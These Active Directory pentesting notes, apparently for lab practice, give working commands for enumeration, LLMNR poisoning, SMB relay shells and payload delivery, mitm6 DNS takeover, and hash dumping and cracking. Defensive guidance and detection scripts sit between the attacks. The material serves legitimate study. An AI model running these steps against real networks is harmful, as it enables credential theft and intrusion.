
AD-Pentesting-Notes :nepal:

**AD Basics**
- Domains
  - Domains are used to group and manage objects in an organization
  - An administrative boundary for applying policies to groups of objects
  - An authentication and authorization boundary that provides a way to limit the scope of access to resources
- Trees
  - A domain tree is a hierarchy of domains in AD DS
  - All domains in the tree:
    - Share a contiguous namespace with the parent domain
    - Can have additional child domains
    - By default create a two-way transitive trust with other domains
- Forests
  - A forest is a collection of one or more domain trees
  - Forests:
    - Share a common schema
    - Share a common configuration partition
    - Share a common global catalog to enable searching
    - Enable trusts between all domains in the forest
    - Share the Enterprise Admins and Schema Admins groups
- Organizational Unit (OU)
  - OUs are Active Directory containers that can contain users, groups, computers and other OUs.
  - OUs are used to:
    - Represent your organization hierarchically and logically
    - Manage a collection of objects in a consistent way
    - Delegate permissions to administer groups of objects
    - Apply policies
- Trusts
  - Trusts provide a mechanism for users to gain access to resources in another domain
  - Types of Trusts
    - Directional: The trust direction flows from the trusting domain to the trusted domain
    - Transitive: The trust relationship is extended beyond a two-domain trust to include other trusted domains.
    - All domains in a forest trust all other domains in the forest
    - Trusts can extend outside the forest
- Objects
  - User: Enables network resource access for a user
  - InetOrgPerson: Similar to a user account; used for compatibility with other directory services
  - Contacts: Used primarily to assign e-mail addresses to external users; does not enable network access
  - Groups: Used to simplify the administration of access control
  - Computers: Enable authentication and auditing of computer access to resources
  - Printers: Used to simplify the process of locating and connecting to printers
  - Shared folders: Enable users to search for shared folders based on properties
- A domain controller is a server with the AD DS server role installed that has specifically been promoted to domain controller. Domain controllers:
  - Host a copy of the AD DS directory store
  - Provide authentication and authorization services
  - Replicate updates to other domain controllers in the domain and forest
  - Allow administrative access to manage user accounts and network resources
- The AD DS (Active Directory Domain Services) data store contains the database file and processes that store and manage directory information for users, services and applications. It:
  - Consists of the Ntds.dit file
  - Is stored by default in the `%SystemRoot%\NTDS` folder on all domain controllers.
  - Is accessible only through the domain controller processes and protocols.
  - `If AD DS is compromised, an attacker can get all the password hashes of the users in that domain.`

- Logical AD Components
  - The AD DS Schema
    - Defines every type of object that can be stored in the directory
    - Enforces rules regarding object creation and configuration
    - Class Object: User, Computer
    - Attribute Object: Display name

**Network Enumeration - NMAP**
- Enumerate Ports
  - `nmap -Pn -p- IP -vv -oA nmap/all-ports`
- Extract Ports
  - `cat nmap/all-ports.nmap | awk -F/ '/open/ {b=b","$1} END {print substr(b,2)}'`
- Enumerate Services
  - `nmap -Pn -sC -sV -oA nmap/services -p <ports> IP --script=vuln -vv`
- A domain controller typically has ports such as `53,88,135,139,389,445,464,593,636,3268,3269,3389` open
- Note down the Fully Qualified Domain Name, DNS Domain Name, DNS Computer Name and Computer Name with their IP and open ports.
  - Fully Qualified Domain Name: A fully qualified domain name (FQDN) is the complete domain name for a specific computer, or host, on the internet. The FQDN consists of two parts: the hostname and the domain name. For example, an FQDN for a hypothetical mail server might be mymail.somecollege.edu.
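Added example (not from these notes or from nmap): a small Python parser that does what the awk one-liner above does on nmap normal output (the `.nmap` file written by `-oA`), builds the comma-separated `-p` list, and flags hosts whose open ports match the domain-controller port set listed above. The scan text and host names are constructed for the demo.

```python
"""Extract open ports from nmap normal output and flag likely domain controllers.

Added example, not part of the original notes. SAMPLE is a constructed scan report;
DC_PORTS is the port set the notes give for a domain controller."""
import re
from typing import Dict, List

DC_PORTS = {53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 3389}

# "445/tcp  open  microsoft-ds" style lines; filtered/closed ports are ignored.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S*)")
HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")


def parse_nmap(text: str) -> Dict[str, List[int]]:
    """Return {host: [open ports]} for every host in the scan output."""
    hosts: Dict[str, List[int]] = {}
    current = None
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = []
            continue
        m = PORT_LINE.match(line)
        if m and current is not None:
            hosts[current].append(int(m.group(1)))
    return hosts


def port_list(ports: List[int]) -> str:
    """Comma-separated list in the form nmap's -p flag accepts."""
    return ",".join(str(p) for p in sorted(ports))


def looks_like_dc(ports: List[int], min_hits: int = 8) -> bool:
    """Heuristic: Kerberos (88) and LDAP (389) open plus most of the DC port set."""
    open_set = set(ports)
    return {88, 389} <= open_set and len(open_set & DC_PORTS) >= min_hits


# Constructed sample output (two hosts, one of them a DC).
SAMPLE = """\
Nmap scan report for dc01.example.local (10.0.0.5)
Host is up (0.0010s latency).
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ssl/ldap
3268/tcp  open  ldap
3389/tcp  open  ms-wbt-server

Nmap scan report for ws01.example.local (10.0.0.20)
Host is up (0.0020s latency).
PORT      STATE SERVICE
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
3389/tcp  filtered ms-wbt-server
"""

if __name__ == "__main__":
    for host, ports in parse_nmap(SAMPLE).items():
        tag = "likely DC" if looks_like_dc(ports) else "member host"
        print(f"{host}: -p {port_list(ports)}  [{tag}]")
```

Feed it the real `nmap/all-ports.nmap` file instead of `SAMPLE` to get the `-p` list for the service scan; the DC heuristic is only a hint, the service scan confirms it.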

**Network Enumeration - SMB**
- List all SMB related scripts in NMAP: `ls /usr/share/nmap/scripts/ | grep smb`
  - `nmap -Pn --script smb-enum* -p139,445 IP | tee smb-enumeration`
  - `nmap -Pn --script smb-vuln* -p139,445 IP | tee smb-vulnerabilities`
- SMB enumeration with smbmap: `smbmap -H IP`
  - Recursive lookup with smbmap: `smbmap -R -H IP`
  - Authenticated enumeration with smbmap: `smbmap -H IP -d <domain> -u <username> -p <password>`
- SMB enumeration with smbclient: `smbclient -L IP`
  - Try to access the share: `smbclient //IP/ShareName`
  - With authentication: `smbclient //IP/ShareName -U htb.local\\username%password`

**Domain Enumeration - ldapsearch**
- View the naming contexts
  - `ldapsearch -x -H ldap://10.129.95.154 -s base namingcontexts`
- ldapsearch is a domain enumeration tool which opens a connection to an LDAP server, binds, and performs a search using the specified parameters.
  - `ldapsearch -x -b "dc=htb,dc=local" -h <IP> -p <port>`
  - The -x flag is used to specify simple (here anonymous) authentication, while the -b flag denotes the base DN to start from.
- Dump only the users using ldapsearch
  - `ldapsearch -x -b "dc=htb,dc=local" -h <IP> -p 389 '(ObjectClass=User)' sAMAccountName | grep sAMAccountName | awk '{print $2}'`
- Dump only the service accounts
  - `ldapsearch -x -b "dc=htb,dc=local" -h <IP> -p 389 | grep -i -a 'Service Accounts'`
- Dump usernames
  - `ldapsearch -H ldap://search.htb -x -D 'username@search.htb' -w "password" -b "DC=search,DC=htb" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F":" '{print $2}'`

**Domain Enumeration - rpcclient**
- RPC (Remote Procedure Call) is a protocol that a program can use to request a service from a program located on another computer on the network without having to understand the network details
- rpcclient requires credentials to access the target, but in some cases anonymous access is allowed.
- Connect to the target domain controller without authentication
  - `rpcclient -U "" -N <IP>` : -N skips the password prompt.
- Connect to the target domain controller with authentication
  - `rpcclient -U "username" <IP>` : Enter the password at the password prompt
- List the commands: `help`
- Get server information: `srvinfo`
- Enumerate the usernames: `enumdomusers`
- Query a particular user: `queryuser <rid>`
- List the password policy of a particular user. For this we need the `rid` of that user, which can be obtained with the above query
  - `getuserdompwinfo <rid>`
- The lookupnames command can be used to look up usernames on the domain controller. It can also be used to extract their SID.
  - `lookupnames <username>`
- Create domain users
  - `createdomuser <username>`
- Delete domain users
  - `deletedomuser <username>`
- Enumerate domains
  - `enumdomains`
- Enumerate domain groups
  - `enumdomaingroups`
- Query domain groups: you will need a rid for this, which can be obtained with the above command.
  - `querygroup <rid>`
- Query the display information about all the users on a domain controller
  - `querydispinfo`
- Enumerate the SMB shares
  - `netshareenum`
- Enumerate the privileges: `enumprivs`

**Domain Enumeration - windapsearch**
- [windapsearch](https://github.com/ropnop/windapsearch) is a python script to enumerate users, groups and computers from a Windows domain through LDAP.
- Enumerate users without credentials
  - `python3 windapsearch.py -d <domain> --dc-ip <IP> -U | tee windapsearch-enumeration-users`
- Enumerate users with credentials
  - `python3 windapsearch.py -d <domain> --dc-ip <IP> -u "domain\\username" -p "password" -U | tee windapsearch-authenticated-enumerations`
- Enumerate groups with credentials
  - `python3 windapsearch.py -d <domain> --dc-ip <IP> -u "domain\\username" -p "password" -G | tee windapsearch-authentication-group-enumerations`
- Enumerate unconstrained computers
  - `python3 windapsearch.py -d <domain> --dc-ip <IP> -u "domain\\username" -p "password" --unconstrained-computers | tee unconstrained-computers-enumeration`
  - Unconstrained means that the computer is able to impersonate anybody whose credentials it holds. If a domain admin connects to one of these unconstrained computers, an attacker on that computer can impersonate the domain admin.
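Added example (not from these notes, nor part of windapsearch or ldapsearch): the unconstrained-computer check above and the "Do not require Kerberos preauthentication" accounts discussed later under GetNPUsers are both just bits of the `userAccountControl` attribute. This Python reads LDIF as `ldapsearch` prints it, decodes the documented flag bits, and reports the accounts an administrator should fix (unconstrained delegation on non-DC accounts, pre-auth disabled, password not required), skipping disabled accounts. The LDIF entries are constructed; the flag values are Microsoft's documented `userAccountControl` bits.

```python
"""Decode userAccountControl from ldapsearch-style LDIF and list risky accounts.

Added example, not part of the notes. SAMPLE_LDIF is constructed; UAC_FLAGS holds
the documented userAccountControl bit values."""
from typing import Dict, List, Optional

UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",          # set on domain controllers
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",        # unconstrained delegation
    0x100000: "NOT_DELEGATED",                # "account is sensitive and cannot be delegated"
    0x400000: "DONT_REQ_PREAUTH",             # AS-REP roastable
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}


def parse_ldif(text: str) -> List[Dict[str, str]]:
    """Minimal LDIF reader: blank line ends an entry, a leading space folds a
    line onto the previous attribute, first value of multi-valued attributes kept."""
    entries: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    last: Optional[str] = None
    for raw in text.splitlines():
        if raw.startswith("#"):
            continue
        if not raw.strip():
            if current:
                entries.append(current)
            current, last = {}, None
            continue
        if raw.startswith(" ") and last is not None:
            current[last] += raw[1:]
            continue
        key, sep, value = raw.partition(":")
        if not sep:
            continue
        key = key.strip().lower()
        if key in current:
            last = None
            continue
        current[key] = value.lstrip(": ").strip()   # "::" (base64) values are kept encoded
        last = key
    if current:
        entries.append(current)
    return entries


def decode_uac(value: int) -> List[str]:
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def risky_accounts(text: str) -> Dict[str, List[str]]:
    """sAMAccountName -> findings for enabled accounts worth fixing."""
    findings: Dict[str, List[str]] = {}
    for e in parse_ldif(text):
        if "useraccountcontrol" not in e or "samaccountname" not in e:
            continue
        flags = decode_uac(int(e["useraccountcontrol"]))
        issues = []
        if "DONT_REQ_PREAUTH" in flags:
            issues.append("Kerberos pre-authentication disabled (AS-REP roastable)")
        if "TRUSTED_FOR_DELEGATION" in flags and "SERVER_TRUST_ACCOUNT" not in flags:
            issues.append("unconstrained delegation on a non-DC account")
        if "PASSWD_NOTREQD" in flags:
            issues.append("password not required")
        if issues and "ACCOUNTDISABLE" not in flags:
            findings[e["samaccountname"]] = issues
    return findings


# Constructed sample, as `ldapsearch ... sAMAccountName userAccountControl` would print it.
SAMPLE_LDIF = """\
# search result for dc=htb,dc=local (constructed)
dn: CN=svc-backup,CN=Users,DC=htb,DC=local
sAMAccountName: svc-backup
userAccountControl: 4260352

dn: CN=FILESRV01,CN=Computers,DC=htb,DC=local
sAMAccountName: FILESRV01$
userAccountControl: 528384

dn: CN=DC01,OU=Domain Controllers,DC=htb,DC=local
sAMAccountName: DC01$
userAccountControl: 532480

dn: CN=jdoe,CN=Users,DC=htb,DC=local
sAMAccountName: jdoe
userAccountControl: 66048

dn: CN=olduser,CN=Users,DC=htb,DC=local
sAMAccountName: olduser
userAccountControl: 4260354
"""

if __name__ == "__main__":
    for account, issues in risky_accounts(SAMPLE_LDIF).items():
        print(account, "->", "; ".join(issues))
```

Domain controllers legitimately carry `TRUSTED_FOR_DELEGATION`, which is why the check excludes `SERVER_TRUST_ACCOUNT`; the fix for the other hits is to clear the delegation or pre-auth setting on the account rather than to rotate its password.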

**Domain Enumeration - LdapDomainDump**
- [LdapDomainDump](https://github.com/dirkjanm/ldapdomaindump) is a tool to enumerate users, groups and computers. A better tool than windapsearch.
  - `python3 ldapdomaindump.py --user "domain\\user" -p "password" ldap://DomainControllerIP:389 --no-json --no-grep -o output`
  - The result can be seen in the output directory. Create the output directory before running the above command.
- Visualizing the dump with a pretty output like enum4linux
  - `ldapdomaindump --user "search.htb\user" -p "password" ldap://search.htb:389 -o output`
  - `ldd2pretty --directory output`

**Domain Enumeration - Enumerating with Enum4Linux**
- Use cases
  - RID cycling (when RestrictAnonymous is set to 1 on Windows 2000)
  - User listing (when RestrictAnonymous is set to 0 on Windows 2000)
  - Listing of group membership information
  - Share enumeration
  - Detecting if a host is in a workgroup or domain
  - Identifying the remote operating system
  - Password policy retrieval (using polenum)
- The "Do Everything" option
  - `enum4linux -a <IP>`. Here the IP is the Domain Controller
- The "Do Everything" option with authentication
  - `enum4linux -u username -p password -a <IP>`
- List of usernames
  - `enum4linux -U <IP>`
- List of usernames with authentication
  - `enum4linux -u username -p password -U <IP>`
- Group membership
  - `enum4linux -G IP`
- nbtstat information
  - `enum4linux -n IP`
- Listing Windows shares
  - `enum4linux -S IP`
- Getting printer information
  - `enum4linux -i IP`
- Note down the domain info like domain names, users and passwords, and the domain SID

**Generate usernames from first name and last name**
```bash
curl https://gist.githubusercontent.com/dzmitry-savitski/65c249051e54a8a4f17a534d311ab3d4/raw/5514e8b23e52cac8534cc3fdfbeb61cbb351411c/user-name-rules.txt >> /etc/john/john.conf
john --wordlist=fullnames.txt --rules=Login-Generator-i --stdout > usernames.txt
```

**Domain Enumeration: Enumerate users with Kerbrute**
```bash
./kerbrute_linux_amd64 userenum --dc 10.10.11.129 -d search.htb ~/htb/search/usernames.txt
```

**Domain Enumeration NMAP Users**
- Using LDAP
  - `nmap -p389 --script ldap-search --script-args 'ldap.username="cn=ippsec,cn=users,dc=pentesting,dc=local",ldap.password=Password12345,ldap.qfilter=users,ldap.attrib=sAMAccountName' -Pn -oA nmap/domain-users <IP>`
  - Where domain name = pentesting.local, username = ippsec, password = Password12345.
  - It will list all the available users on the domain.
  - For enumerating groups, change `cn=users` to `cn=groups` and `ldap.qfilter=users` to `ldap.qfilter=groups` in the above command

- Using Kerberos
  - `nmap -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='pentesting.local' -Pn <IP>` -> Anonymous enumeration

**Domain Enumeration GetADUsers.py**
- A python script developed by impacket to enumerate the domain users. [Download](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetADUsers.py)
  - `python3 GetADUsers.py -all pentesting.local/ippsec:Password12345 -dc-ip 192.168.10.50`
  - Where pentesting.local is the domain name, and ippsec / Password12345 are credentials for the domain controller 192.168.10.50
- Other tools developed by impacket are [here](https://github.com/SecureAuthCorp/impacket/tree/master/examples).
- Find Delegations: AD delegation is a critical part of security and compliance. By delegating control over Active Directory, you can grant users or groups the permissions they need without adding them to privileged groups like Domain Admins and Account Operators.
  - `python3 findDelegation.py -dc-ip 192.168.1.50 pentesting.local/ippsec:Password12345` - Download the script from [here](https://github.com/SecureAuthCorp/impacket/blob/master/examples/findDelegation.py).

**LLMNR Poisoning**
- LLMNR: Link Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link.
  - Used to identify a host when DNS fails to do so.
  - Previously NBT-NS
  - The key flaw is that the services send the user's username and NTLMv2 hash to whoever responds to the query
- LLMNR poisoning is performed through a tool called [Responder](https://github.com/SpiderLabs/Responder). Responder is a tool to run first thing in the morning when users connect to the network, or after lunch time.
  - Syntax: `python Responder.py -I <interface> -rdw`
  - Once the event is triggered, Responder will capture the victim's IP address, username and NTLMv2 hash
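Added example (not from these notes, nor from Responder): because LLMNR reuses the DNS packet layout, a network sensor listening on UDP 5355 (multicast 224.0.0.252 / ff02::1:3) can decode every query with a few lines of Python and log which names hosts are trying to resolve through LLMNR. That is exactly the traffic a poisoner answers, so seeing any of it on a network where LLMNR is supposed to be disabled is itself a finding. The packet bytes below are constructed; `build_query` only assembles a query, the same thing a Windows client sends when DNS fails.

```python
"""Decode LLMNR queries (DNS packet format, UDP 5355) for a detection sensor.

Added example, not part of the notes. SAMPLE_PACKET is constructed."""
import struct
from dataclasses import dataclass
from typing import List, Tuple

LLMNR_PORT = 5355
QTYPE_NAMES = {1: "A", 28: "AAAA", 12: "PTR", 255: "ANY"}


@dataclass
class LlmnrQuery:
    txid: int
    is_response: bool               # QR bit: set on answers, clear on queries
    names: List[Tuple[str, str]]    # (queried name, qtype name)


def _read_name(buf: bytes, off: int) -> Tuple[str, int]:
    """Read a DNS-style label sequence. LLMNR questions are not compressed,
    so a pointer label (top two bits set) is treated as malformed."""
    labels = []
    while True:
        if off >= len(buf):
            raise ValueError("truncated name")
        length = buf[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(buf[off:off + length].decode("ascii", "replace"))
        off += length
    return ".".join(labels), off


def parse_llmnr(buf: bytes) -> LlmnrQuery:
    """Parse the 12-byte DNS header and every question it announces."""
    if len(buf) < 12:
        raise ValueError("packet shorter than LLMNR header")
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", buf[:12])
    off = 12
    names = []
    for _ in range(qdcount):
        name, off = _read_name(buf, off)
        if off + 4 > len(buf):
            raise ValueError("truncated question")
        qtype, _qclass = struct.unpack("!HH", buf[off:off + 4])
        off += 4
        names.append((name, QTYPE_NAMES.get(qtype, str(qtype))))
    return LlmnrQuery(txid=txid, is_response=bool(flags & 0x8000), names=names)


def build_query(txid: int, name: str, qtype: int = 1) -> bytes:
    """Assemble a query packet for the demo (what a client emits when DNS fails)."""
    body = b"".join(bytes([len(p)]) + p.encode("ascii") for p in name.split("."))
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + body + b"\x00" + struct.pack("!HH", qtype, 1)


# Constructed sample: a host looking for a mistyped share server name.
SAMPLE_PACKET = build_query(0x1A2B, "fileservr01")


def log_line(src_ip: str, buf: bytes) -> str:
    """One log line per packet; a real sensor would emit this for every datagram
    received on LLMNR_PORT and alert on any query in an LLMNR-disabled network."""
    q = parse_llmnr(buf)
    kind = "response" if q.is_response else "query"
    return f"LLMNR {kind} txid={q.txid:#06x} from {src_ip}: " + ", ".join(f"{n} ({t})" for n, t in q.names)


if __name__ == "__main__":
    print(log_line("10.0.0.20", SAMPLE_PACKET))
```

Responses matter as much as queries: an LLMNR answer arriving from a host that is not the named machine is the poisoning itself, so the sensor should keep the `is_response` flag and the source address together.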

**Capturing NTLMv2 Hashes with Responder**
- `responder -I eth0 -rdwv | tee responderHash.txt`

**Password Cracking with Hashcat**
- [Hashcat](https://github.com/hashcat/hashcat) is a tool used to crack hashes of many different types (hash modes)
- Copy the hashes collected from Responder. Example:
  - `echo "admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030" > hash.txt`
  - `hashcat -m 5600 hash.txt /path/to/wordlist.txt`
  - Where -m selects the hash mode and 5600 is the mode for NTLMv2

**LLMNR Poisoning Defense**
- Disable LLMNR and NBT-NS
  - To disable LLMNR, select "Turn OFF Multicast Name Resolution" under Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client in the Group Policy Editor.
  - To disable NBT-NS, navigate to Network Connections > Network Adapter Properties > TCP/IPv4 Properties > Advanced tab > WINS tab and select "Disable NetBIOS over TCP/IP"
- If a company must use or cannot disable LLMNR/NBT-NS, the best course of action is to:
  - Require Network Access Control, for example MAC binding or switchport security, so that an attacker's device cannot connect to the network.
  - Require strong user passwords (e.g., > 14 characters in length and limit common usage).

**SMB Relay Overview**
- Instead of cracking hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access
- Requirements
  - SMB signing must be disabled on the target
  - Relayed user credentials must be admin on the machine
- Grab the NTLM hash from one machine and relay that NTLM hash to another machine as specified in ntlmrelayx. Therefore at least two machines are needed to perform a relay
- Step 1
  - Discover hosts with SMB signing disabled
  - `nmap --script=smb2-security-mode.nse -p445 192.168.57.0/24`
  - If the result is "Message signing enabled but not required", then we can perform the attack as well.
- Step 2
  - Add the IPs with SMB signing disabled to the targets.txt file.
- Step 3
  - Open the Responder configuration file and turn off SMB and HTTP: `vim /usr/share/responder/Responder.conf` or `vim /etc/responder/Responder.conf`
  - We will be listening but not responding
- Step 4
  - Run Responder: `python Responder.py -I eth0 -rdwv`
- Step 5
  - Run [NTLMrelayx](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py): `python ntlmrelayx.py -tf targets.txt -smb2support`
  - It takes the relay and passes it to the targets file that you specify. -smb2support: also handles SMB2 targets.
  - Wait until an event triggers
- Step 6 : Win
  - It relays the credentials that it captures to the other machine. It will dump the SAM hashes (similar to the /etc/shadow file on Linux)
  - We can crack those hashes to get the passwords or we can pass those hashes to get access to other machines as well.
- Step 7 : Post Exploitation
  - Run Responder as before
  - Run NTLMRelayx in interactive mode
    - `python ntlmrelayx.py -tf targets.txt -smb2support -i`
  - Set up a listener
    - `nc 127.0.0.1 <port>` - the port number is shown in the ntlmrelayx output
    - `help` : Here we have an SMB shell
    - List shares: `shares`
    - `use C$`
    - `ls`
    - We have full access to the computer: we can add files, read files
  - We can also set up a meterpreter listener
    - `python ntlmrelayx.py -tf targets.txt -smb2support -e test.exe` where test.exe is a meterpreter payload (executable)
  - Execute specific commands
    - `python ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"`
  - Getting a shell with [psexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py)
    - `python3 psexec.py marvel.local/fcastle:Password1@192.168.57.141`

**Defending SMB relay**
- Enable SMB Signing on all devices (Best solution)
  - Pro: Completely stops the attack
  - Con: Can cause performance issues with file copies
- Disable NTLM authentication on the network
  - Pro: Completely stops the attack
  - Con: If Kerberos stops working, Windows defaults back to NTLM
- Account tiering
  - Pro: Limits domain admins to specific tasks (e.g. only log onto servers with a need for DA)
  - Con: Enforcing the policy may be difficult
- Local admin restriction (Best solution)
  - Pro: Can prevent a lot of lateral movement
  - Con: Potential increase in the amount of service desk tickets
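Added example (not from these notes, nor from nmap): "Enable SMB signing on all devices" is only done when no host answers "not required" any more, and the `smb2-security-mode` scan from Step 1 above is the natural way to track that. This Python reads that scan's text and lists the hosts where signing is not enforced, the ones still to be fixed through the "Microsoft network server: Digitally sign communications (always)" policy (the `RequireSecuritySignature` setting). The nmap text below is constructed to resemble the script's output; the parser relies only on the "Message signing ..." wording.

```python
"""List hosts whose SMB signing is not enforced, from nmap smb2-security-mode output.

Added example, not part of the notes. SAMPLE is constructed scan text."""
import re
from typing import Dict, List

# "Nmap scan report for 10.0.0.1" or "Nmap scan report for host (10.0.0.1)"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?")
SIGN_RE = re.compile(r"Message signing (enabled|disabled)(?: (and|but) (not )?required)?", re.I)


def signing_status(nmap_text: str) -> Dict[str, str]:
    """Return {ip: 'required' | 'not-required' | 'disabled' | 'unknown'}."""
    result: Dict[str, str] = {}
    host = None
    for line in nmap_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            result[host] = "unknown"     # no script output for this host
            continue
        m = SIGN_RE.search(line)
        if m and host:
            enabled, negated = m.group(1).lower(), m.group(3)
            if enabled == "disabled":
                result[host] = "disabled"
            elif negated:
                result[host] = "not-required"
            else:
                result[host] = "required"
    return result


def relay_exposed(nmap_text: str) -> List[str]:
    """Hosts where signing is not enforced: still relayable, still to be fixed."""
    return sorted(ip for ip, s in signing_status(nmap_text).items()
                  if s in ("not-required", "disabled"))


SAMPLE = """\
Nmap scan report for 192.168.57.140
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for ws01.marvel.local (192.168.57.141)
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 192.168.57.142
Host script results:
| smb2-security-mode:
|   2.1:
|_    Message signing disabled

Nmap scan report for 192.168.57.143
Host is up (0.0010s latency).
"""

if __name__ == "__main__":
    for ip, status in signing_status(SAMPLE).items():
        print(f"{ip:16} {status}")
    print("to fix:", ", ".join(relay_exposed(SAMPLE)))
```

Hosts reported as `unknown` had no script result (port closed or filtered) and should be re-checked rather than assumed safe.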

**IPv6 Attacks**
- DNS takeover attack via IPv6
  - It is another form of relaying attack, but it is much more reliable because it utilizes IPv6.
  - Mostly IPv6 is turned on but only IPv4 is utilized.
  - Even though only IPv4 is used, the hosts still look for an IPv6 DNS server, and on most computers no IPv6 DNS server is configured.
  - An attacker can set up a machine and listen for all the IPv6 messages that come through, answering "I AM YOUR DNS".
  - We can also get authentication to the Domain Controller when this happens
  - We can perform this attack with [mitm6](https://github.com/dirkjanm/mitm6)

**IPv6 DNS Takeover via mitm6**
- `mitm6 -d marvel.local` - keep this running
- Set up a relay attack: `ntlmrelayx.py -6 -t ldaps://192.168.57.140 -wh fakewpad.marvel.local -l lootme`
  - Where -6 is for IPv6, 192.168.57.140 is the domain controller and -l is for loot, to grab more information
- Scenario: the IPv6 client sends out a request asking who its DNS server is, and it sends it out every 30 minutes
- More details about [mitm6](https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/)
- More details about [Combining NTLM Relays and Kerberos Delegation](https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/)

**IPv6 Attack Defense**
- IPv6 poisoning abuses the fact that Windows queries for an IPv6 address even in IPv4-only environments. If you don't use IPv6 internally, the safest way to prevent mitm6 is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy. Disabling IPv6 entirely may have unwanted side effects. Setting the following predefined rules to Block instead of Allow prevents the attack from working:
  - (Inbound) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPV6-In)
  - (Inbound) Core Networking - Router Advertisement (ICMPv6-In)
  - (Outbound) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPV6-Out)
- If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service.
- Relaying to LDAP and LDAPS can only be mitigated by enabling LDAP signing and LDAP channel binding.
- Consider adding administrative users to the Protected Users group or marking them as "Account is sensitive and cannot be delegated", which will prevent any impersonation of that user via delegation.

**GetNPUsers & Kerberos Pre-Auth**
- List the users which have Kerberos Pre-Authentication disabled.
  - `python3 getnpusers.py htb.local/ -dc-ip 192.168.170.115`
- Grab the hashes of the listed users
  - `python3 getnpusers.py htb.local/ -dc-ip 192.168.170.115 -request`
- With authentication
  - `impacket-GetNPUsers 'search.htb/user:password' -usersfile usernames.txt -dc-ip 'search.htb'`

**AD Post Compromise Enumeration**
- Domain Enumeration with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
  - PowerView is a tool that allows us to look at the network and enumerate the Domain Controller, Domain Policy, Users, Groups etc.
  - Download the PowerView script from above.
  - `powershell -ep bypass`
    - Where bypass is an execution policy; this removes the block on script execution.
  - Load the script: `. .\PowerView.ps1`
  - Get domain information: `Get-NetDomain`
  - Get specific domain controllers: `Get-NetDomainController`
  - Get domain policy: `Get-DomainPolicy`
  - Get a specific policy like system access: `(Get-DomainPolicy)."system access"`
  - Get the users: `Get-NetUser`
  - Get the list of users: `Get-NetUser | select cn`
  - Get Domain Admins: `Get-NetGroup -GroupName "Domain Admins"`
  - List all the files being shared on the network: `Invoke-ShareFinder`
  - [PowerView cheatsheet](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993)
- Bloodhound Overview and Setup
  - `sudo apt install bloodhound`
  - It runs on a tool called neo4j
  - `neo4j console` - Create a new password.
  - `bloodhound`
- Grabbing Data with Invoke-Bloodhound
  - Download the [SharpHound](https://github.com/puckiestyle/powershell/blob/master/SharpHound.ps1) script.
  - Move the file onto the compromised victim PC.
  - Enable execution: `powershell -ep bypass`
  - Load the script: `. .\SharpHound.ps1`
  - Run the collector: `Invoke-BloodHound -CollectionMethod All -Domain MARVEL.local -ZipFileName file.zip`
  - All the data is collected in the zip file.
  - Move the file to the attacker machine.
  - Click on "Upload Data" and upload the zip file

**AD Post Compromise Attacks**
- Pass the Hash/Password Overview
  - If we crack a password and/or can dump the SAM hashes, we can leverage both for lateral movement in networks.
  - Pass the Password: `crackmapexec smb <IP> -u <username> -d <domain> -p <password>`
- Dumping Hashes with [secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py)
  - It is also a part of the impacket tools
  - `secretsdump.py marvel/fcastle:Password1@192.168.57.141`
  - It dumps SAM hashes, DPAPI keys as well as LSA secrets
  - If there is password reuse, the last part of the hash line (the NT hash) will be the same
- Cracking NTLM Hashes with Hashcat
  - `hashcat -m 1000 hashes.txt wordlist.txt -O`
- Pass the Hash Attacks
